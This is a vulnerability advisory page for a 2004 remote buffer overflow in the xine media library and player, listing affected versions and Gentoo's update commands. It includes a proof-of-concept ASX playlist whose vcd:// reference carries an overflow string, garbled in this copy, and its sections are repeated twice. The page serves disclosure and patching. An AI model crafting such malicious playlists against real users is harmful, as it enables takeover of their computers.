Xine-Lib Remote Buffer Overflow Vulnerability
BID:10890
Info
Xine-Lib Remote Buffer Overflow Vulnerability
| Bugtraq ID: | 10890 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 08 2004 12:00AM |
| Updated: | Aug 08 2004 12:00AM |
| Credit: | Discovery is credited to [email protected]. |
| Vulnerable: |
xine xine-ui 0.99.2 xine xine-ui 0.99.1 xine xine-ui 0.9.23 xine xine-ui 0.9.22 xine xine-ui 0.9.21 xine xine-ui 0.9.20 xine xine-lib 1-rc5 xine xine-lib 1-rc4 xine xine-lib 1-rc3c xine xine-lib 1-rc3b xine xine-lib 1-rc3a xine xine-lib 1-rc2 xine xine-lib 1-beta9 xine xine-lib 1-beta8 xine xine-lib 1-beta7 xine xine-lib 1-beta6 xine xine-lib 1-beta5 xine xine-lib 1-beta4 xine xine-lib 1-beta3 xine xine-lib 1-beta2 xine xine-lib 1-beta11 xine xine-lib 1-beta10 xine xine-lib 1-beta1 |
| Not Vulnerable: | |
Discussion
Xine-Lib Remote Buffer Overflow Vulnerability
It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer.
xine-lib rc-5 and prior versions are reportedly affected by this issue. xine versions 0.99.2 and prior are also vulnerable.
It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer.
xine-lib rc-5 and prior versions are reportedly affected by this issue. xine versions 0.99.2 and prior are also vulnerable.
Exploit / POC
Xine-Lib Remote Buffer Overflow Vulnerability
The following proof of concept is available:
<asx version = "3.0">
<title>Open Security Media Archive</title>
<author>Brought to you by c0ntex[at]open-security.org</author>
<abstract>
SongList:
Track 1 - Open Security Rock(s) -> SOAD - Chop Suey
Track 2 - Open Security Rock(s) -> Media Mayhem Militia
</abstract>
<entry>
<title>System Of A Down - Chop Suey</title>
<author>c0ntex[at]open-security.org</author>
<copyright>?2004</copyright>
<Ref href = "http://sunscreen/SOAD-ChopSuey.mp3"/>
</entry>
<entry>
<title>All your media are belong to us!</title>
<author>c0ntex[at]open-security.org</author>
<copyright>?2004</copyright>
<Ref href = "vcd://
????> "/>
</entry>
</asx>
Local exploit code is available.
The following proof of concept is available:
<asx version = "3.0">
<title>Open Security Media Archive</title>
<author>Brought to you by c0ntex[at]open-security.org</author>
<abstract>
SongList:
Track 1 - Open Security Rock(s) -> SOAD - Chop Suey
Track 2 - Open Security Rock(s) -> Media Mayhem Militia
</abstract>
<entry>
<title>System Of A Down - Chop Suey</title>
<author>c0ntex[at]open-security.org</author>
<copyright>?2004</copyright>
<Ref href = "http://sunscreen/SOAD-ChopSuey.mp3"/>
</entry>
<entry>
<title>All your media are belong to us!</title>
<author>c0ntex[at]open-security.org</author>
<copyright>?2004</copyright>
<Ref href = "vcd://
????> "/>
</entry>
</asx>
Local exploit code is available.
Solution / Fix
Xine-Lib Remote Buffer Overflow Vulnerability
Solution:
Gentoo has released an advisory (GLSA 200408-18) to address this issue. Please see the referenced advisory for more information. Gentoo users may carry out the following commands to update their computers:
emerge sync
emerge -pv ">=media-libs/xine-lib-1_rc5-r3"
emerge ">=media-libs/xine-lib-1_rc5-r3"
Solution:
Gentoo has released an advisory (GLSA 200408-18) to address this issue. Please see the referenced advisory for more information. Gentoo users may carry out the following commands to update their computers:
emerge sync
emerge -pv ">=media-libs/xine-lib-1_rc5-r3"
emerge ">=media-libs/xine-lib-1_rc5-r3"